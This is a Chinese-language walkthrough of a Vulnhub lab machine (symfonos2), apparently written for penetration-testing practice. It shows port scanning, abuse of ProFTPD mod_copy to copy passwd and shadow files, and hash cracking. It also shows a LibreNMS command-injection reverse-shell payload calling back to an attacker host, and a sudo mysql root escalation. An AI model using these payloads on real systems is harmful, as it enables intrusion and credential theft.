Vulnhub-symfonos2靶场渗透
目标发现
由于是在同一网络下的靶机,那么可以使用arp-scan进行扫描发现目标:
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan 192.168.56.0/24
[sudo] kali 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6f:0f:9f, IPv4: 192.168.56.128
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 00:50:56:c0:00:08 (Unknown)
192.168.56.2 00:50:56:fa:da:39 (Unknown)
192.168.56.137 00:0c:29:87:32:56 (Unknown)
192.168.56.254 00:50:56:e6:cb:ba (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.872 seconds (136.75 hosts/sec). 4 responded
从扫描结果来看目标应该是192.168.56.137,下面就需要进行资产搜集,查找开放的端口以及相关服务识别。
信息搜集
开放端口信息
开放端口识别:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ sudo nmap -sS -p- 192.168.56.137 --min-rate=10000 -oA nmap_result/nmap_portscan
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-04 14:53 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00015s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:87:32:56 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.87 seconds
开放的端口服务识别:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ cat nmap_result/nmap_portscan/nmap_portscan.nmap | grep open | awk -F/ '{print $1}' | tr '\n' ','
21,22,80,139,445,
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ sudo nmap -sS -sV -p21,22,80,139,445,2 -A 192.168.56.137 --min-rate=10000 -oA nmap_result/nmap_portserver
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-04 14:56 EDT
Nmap scan report for 192.168.56.137
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
2/tcp closed compressnet
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: webfs/1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:87:32:56 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2026-05-04T13:56:18-05:00
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2026-05-04T18:56:18
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.56.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
通过上面的扫描汇总后可以得到下面的信息:
- 操作系统:Linux 3.2 – 4.14 (Debian)
| 端口 | 协议 | 服务 | 版本 / 关键信息 |
|---|---|---|---|
| 21 | open | FTP | ProFTPD 1.3.5;可尝试匿名登录 |
| 22 | open | SSH | OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) |
| 80 | open | HTTP | WebFS httpd 1.21(非主流 Web 服务器);无页面标题 |
| 139 | open | NetBIOS-SSN | Samba smbd 3.X – 4.X;NetBIOS 名称:SYMFONOS2 |
| 445 | open | SMB | Samba 4.5.16-Debian;SMB2/3 消息签名未强制;guest 账户可用;WORKGROUP |
综合来看除了22和139端口的服务暂时不考虑外,其他的都可进行尝试。
SMB服务(445)
使用smbclient对目标进行共享目录枚举:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ smbclient -L 192.168.56.137 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SYMFONOS2
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ smbclient //192.168.56.137/anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16313716 blocks available
smb: \> cd backups\
smb: \backups\> ls
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16313716 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (412.1 KiloBytes/sec) (average 412.1 KiloBytes/sec)
smb: \backups\> exit
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ cat log.txt root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
# - When such options are commented with ";", the proposed setting
# differs from the default Samba behaviour
# - When commented with "#", the proposed setting is the default
# behaviour of Samba but the option is considered important
# enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic
# errors.
#======================= Global Settings =======================
[global]
## Browsing/Identification ###
# Change this to the workgroup/NT-domain name your Samba server will part of
workgroup = WORKGROUP
# Windows Internet Name Serving Support Section:
# WINS Support - Tells the NMBD component of Samba to enable its WINS Server
# wins support = no
# WINS Server - Tells the NMBD components of Samba to be a WINS Client
# Note: Samba can be either a WINS Server, or a WINS Client, but NOT both
; wins server = w.x.y.z
# This will prevent nmbd to search for NetBIOS names through DNS.
dns proxy = no
#### Networking ####
# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
; interfaces = 127.0.0.0/8 eth0
# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself. However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
; bind interfaces only = yes
#### Debugging/Accounting ####
# This tells Samba to use a separate log file for each machine
# that connects
log file = /var/log/samba/log.%m
# Cap the size of the individual log files (in KiB).
max log size = 1000
# If you want Samba to only log through syslog then set the following
# parameter to 'yes'.
# syslog only = no
# We want Samba to log a minimum amount of information to syslog. Everything
# should go to /var/log/samba/log.{smbd,nmbd} instead. If you want to log
# through syslog you should set the following parameter to something higher.
syslog = 0
# Do something sensible when Samba crashes: mail the admin a backtrace
panic action = /usr/share/samba/panic-action %d
####### Authentication #######
# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller".
#
# Most people will want "standalone sever" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
server role = standalone server
# If you are using encrypted passwords, Samba will need to know what
# password database type you are using.
passdb backend = tdbsam
obey pam restrictions = yes
# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
unix password sync = yes
# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
passwd program = /usr/bin/passwd %u
passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
pam password change = yes
# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
map to guest = bad user
########## Domains ###########
#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set
#
# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
; logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
# logon path = \\%N\%U\profile
# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
; logon drive = H:
# logon home = \\%N\%U
# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
; logon script = logon.cmd
# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe. The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u
# This allows machine accounts to be created on the domain controller via the
# SAMR RPC pipe.
# The following assumes a "machines" group exists on the system
; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u
# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.
; add group script = /usr/sbin/addgroup --force-badname %g
############ Misc ############
# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
; include = /home/samba/etc/smb.conf.%m
# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
; idmap uid = 10000-20000
; idmap gid = 10000-20000
; template shell = /bin/bash
# Setup usershare options to enable non-root users to share folders
# with the net usershare command.
# Maximum number of usershare. 0 (default) means that usershare is disabled.
; usershare max shares = 100
# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
usershare allow guests = yes
#======================= Share Definitions =======================
[homes]
comment = Home Directories
browseable = no
# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
read only = yes
# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
create mask = 0700
# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
directory mask = 0700
# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
valid users = %S
# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
; comment = Network Logon Service
; path = /home/samba/netlogon
; guest ok = yes
; read only = yes
# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
; comment = Users profiles
; path = /home/samba/profiles
; guest ok = no
; browseable = no
; create mask = 0600
; directory mask = 0700
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[anonymous]
path = /home/aeolus/share
browseable = yes
read only = yes
guest ok = yes
root@symfonos2:~# cat /usr/local/etc/proftpd.conf
# This is a basic ProFTPD configuration file (rename it to
# 'proftpd.conf' for actual use. It establishes a single server
# and a single anonymous login. It assumes that you have a user/group
# "nobody" and "ftp" for normal operation and anon.
ServerName "ProFTPD Default Installation"
ServerType standalone
DefaultServer on
# Port 21 is the standard FTP port.
Port 21
# Don't use IPv6 support by default.
UseIPv6 off
# Umask 022 is a good standard umask to prevent new dirs and files
# from being group and world writable.
Umask 022
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd).
MaxInstances 30
# Set the user and group under which the server will run.
User aeolus
Group aeolus
# To cause every FTP user to be "jailed" (chrooted) into their home
# directory, uncomment this line.
#DefaultRoot ~
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Bar use of SITE CHMOD by default
<Limit SITE_CHMOD>
DenyAll
</Limit>
# A basic anonymous configuration, no upload directories. If you do not
# want anonymous users, simply delete this entire <Anonymous> section.
<Anonymous ~ftp>
User ftp
Group ftp
# We want clients to be able to login with "anonymous" as well as "ftp"
UserAlias anonymous ftp
# Limit the maximum number of anonymous logins
MaxClients 10
# We want 'welcome.msg' displayed at login, and '.message' displayed
# in each newly chdired directory.
#DisplayLogin welcome.msg
#DisplayChdir .message
# Limit WRITE everywhere in the anonymous chroot
<Limit WRITE>
DenyAll
</Limit>
</Anonymous>
可以看到有一个anonymous的共享目录,进入后发现里面有一个log.txt的备份文件,其中有大量内容,经过整理发现以下重要信息:
- 用户名:aeolus(
ProFTPD 配置:User aeolus / Group aeolus和SMB 共享路径:path = /home/aeolus/share) - 存在 shadow 备份文件(
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak)
但这些信息目前无法进行利用。
Web服务(80)
先尝试访问目标的Web服务:
可以看到只有一副画作为背景图,尝试进行目录爆破:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/80]
└─$ sudo dirsearch -u http://192.168.56.137 -x 403
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kali/Work/vulnhub/symfonos2/80/reports/http_192.168.56.137/_26-05-04_15-21-59.txt
Target: http://192.168.56.137/
[15:21:59] Starting:
Task Completed
没有任何有效信息。
FTP服务(21)
尝试通过匿名登录ftp服务:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ ftp 192.168.56.137
Connected to 192.168.56.137.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.137]
Name (192.168.56.137:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
530 Login incorrect.
ftp: Login failed
ftp>
可以看到登录失败了,无法通过匿名登入ftp。
服务漏洞
到目前没有任何可探索的服务了,但前面nmap的扫描结果发现了ftp和web服务的版本信息,可以尝试查找一下是否存在已知漏洞poc:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/80]
└─$ searchsploit WebFS 1.21
Exploits: No Results
Shellcodes: No Results
Papers: No Results
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/80]
└─$ searchsploit proftpd 1.3.5
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
----------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
可以看到通过searchsploit中查找到了ftp服务的RCE历史漏洞CVE-2015-3306,即ProFTPD 1.3.5 的 mod_copy 模块允许未经认证使用 SITE CPFR(Copy From)和 SITE CPTO(Copy To)复制服务器上的任意文件。
这里由于下载的poc有问题无法执行,可以使用nc将需要的文件进行拷贝:
passwd文件:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/nmap_result]
└─$ nc 192.168.56.137 21 << 'EOF'
SITE CPFR /etc/passwd
SITE CPTO /home/aeolus/share/passwd_test
QUIT
EOF
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.137]
350 File or directory exists, ready for destination name
250 Copy successful
221 Goodbye.
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ smbclient //192.168.56.137/anonymous -N -c 'get passwd_test'
getting file \passwd_test of size 1614 as passwd_test (788.0 KiloBytes/sec) (average 788.1 KiloBytes/sec)
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ cat passwd_test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
aeolus:x:1000:1000:,,,:/home/aeolus:/bin/bash
cronus:x:1001:1001:,,,:/home/cronus:/bin/bash
mysql:x:110:114:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:111:115::/var/lib/snmp:/bin/false
librenms:x:999:999::/opt/librenms:
shadow文件:
PS:这个文件在前面信息搜集的时候提到将shadow进行了备份:root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak,所以直接将备份的shadow文件读出
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ nc 192.168.56.137 21 << 'EOF'
SITE CPFR /var/backups/shadow.bak
SITE CPTO /home/aeolus/share/shadow.bak
QUIT
EOF
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.56.137]
350 File or directory exists, ready for destination name
250 Copy successful
221 Goodbye.
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ smbclient //192.168.56.137/anonymous -N -c 'get shadow.bak'
getting file \shadow.bak of size 1173 as shadow.bak (572.7 KiloBytes/sec) (average 572.8 KiloBytes/sec)
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ cat shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
daemon:*:18095:0:99999:7:::
bin:*:18095:0:99999:7:::
sys:*:18095:0:99999:7:::
sync:*:18095:0:99999:7:::
games:*:18095:0:99999:7:::
man:*:18095:0:99999:7:::
lp:*:18095:0:99999:7:::
mail:*:18095:0:99999:7:::
news:*:18095:0:99999:7:::
uucp:*:18095:0:99999:7:::
proxy:*:18095:0:99999:7:::
www-data:*:18095:0:99999:7:::
backup:*:18095:0:99999:7:::
list:*:18095:0:99999:7:::
irc:*:18095:0:99999:7:::
gnats:*:18095:0:99999:7:::
nobody:*:18095:0:99999:7:::
systemd-timesync:*:18095:0:99999:7:::
systemd-network:*:18095:0:99999:7:::
systemd-resolve:*:18095:0:99999:7:::
systemd-bus-proxy:*:18095:0:99999:7:::
_apt:*:18095:0:99999:7:::
Debian-exim:!:18095:0:99999:7:::
messagebus:*:18095:0:99999:7:::
sshd:*:18095:0:99999:7:::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
密码爆破
获取到了passwd和shadow文件后即可使用john或者hashcat对存在bash的真实用户进行密码爆破:
# 把 passwd 和 shadow 合并成 john 能认的格式
unshadow passwd_test shadow.bak > crack_target.txt
# 用 rockyou 字典跑
john crack_target.txt --wordlist=/usr/share/wordlists/rockyou.txt
# 查结果
john crack_target.txt --show
john:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ john crack_target.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Remaining 2 password hashes with 2 different salts
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:16:03 16.97% (ETA: 18:56:26) 0g/s 2756p/s 5513c/s 5513C/s xxx26xxx..xxx 4 free
Session aborted
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ john crack_target.txt --show
aeolus:sergioteamo:1000:1000:,,,:/home/aeolus:/bin/bash
1 password hash cracked, 2 left
hashcat:
Temp\vulnhub\symfonos2
❯ hashcat -m 1800 -a 0 -O .\crack_tatget.txt D:\SafetyTools\DB\db\rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #2: Intel(R) Graphics, 8352/16797 MB (2047 MB allocatable), 64MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 15
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 562 MB
Dictionary cache built:
* Filename..: D:\SafetyTools\DB\db\rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:sergioteamo
可以看到跑出来一个可用凭据:aeolus:sergioteamo
成功使用ssh登录:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ ssh aeolus@192.168.56.137
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:bVM6iESUngv842ilwZ5pthpPxRaIrgL4RxNNbnBFssQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
aeolus@192.168.56.137's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1
aeolus@symfonos2:~$ whoami
aeolus
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
提权
查看是否有能用于提权是sudo、suid等:
aeolus@symfonos2:~$ sudo -l
[sudo] password for aeolus:
Sorry, user aeolus may not run sudo on symfonos2.
aeolus@symfonos2:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
aeolus@symfonos2:~$ find / -perm -4000 -type f 2>/dev/null | grep -v proc
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/bin/mount
/bin/su
/bin/ping
/bin/umount
这里并没有发现可以利用的点。
LibreNMS服务
PS:这里问了下ai,提示是LibreNMS提权,在 /etc/passwd 里存在 librenms 用户和 ss -tlnp 发现 8080 本地监听:
aeolus@symfonos2:~$ ss -tlnp State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 80 127.0.0.1:3306 *:* LISTEN 0 50 *:139 *:* LISTEN 0 128 127.0.0.1:8080 *:* LISTEN 0 32 *:21 *:* LISTEN 0 128 *:22 *:* LISTEN 0 20 127.0.0.1:25 *:* LISTEN 0 50 *:445 *:* LISTEN 0 50 :::139 :::* LISTEN 0 64 :::80 :::* LISTEN 0 128 :::22 :::* LISTEN 0 20 ::1:25 :::* LISTEN 0 50 :::445 :::*本地 8080 是 Web 服务,结合 librenms 用户,基本可以确定是 LibreNMS 跑在这里,然后进行后续利用。
思路就是:本地有 Web 服务 → 做 SSH 端口转发转出来 → 访问 → 找已知漏洞提权
新开一个ssh连接作为隧道:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ ssh -L 8080:127.0.0.1:8080 aeolus@192.168.56.137
aeolus@192.168.56.137's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 4 16:41:42 2026 from 192.168.56.128
aeolus@symfonos2:~$
然后通过浏览器进行访问:
成功访问该服务,使用已有的凭据(aeolus:sergioteamo)成功登入:
kali发起监听:
nc -lvnp 4444
在浏览器顶部菜单 Devices → Add Device:
- Hostname:test
- SNMP version:v2c
- Community 字段写入 payload:
'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 4444 >/tmp/f) #
保存后即可接收反弹的shell:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.128] from (UNKNOWN) [192.168.56.137] 44724
/bin/sh: 0: can't access tty; job control turned off
$ whoami
cronus
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
sudo提权
可以看到sudo中提示不需要密码即可运行mysql:
$ sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
$
在GTFObins中查询到可以利用该程序打开一个root的shell:
$ sudo mysql -e '\! /bin/bash'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
获取flag
获得root权限后在root家目录下发现flag文件:
ls /root
proof.txt
cat /root/proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
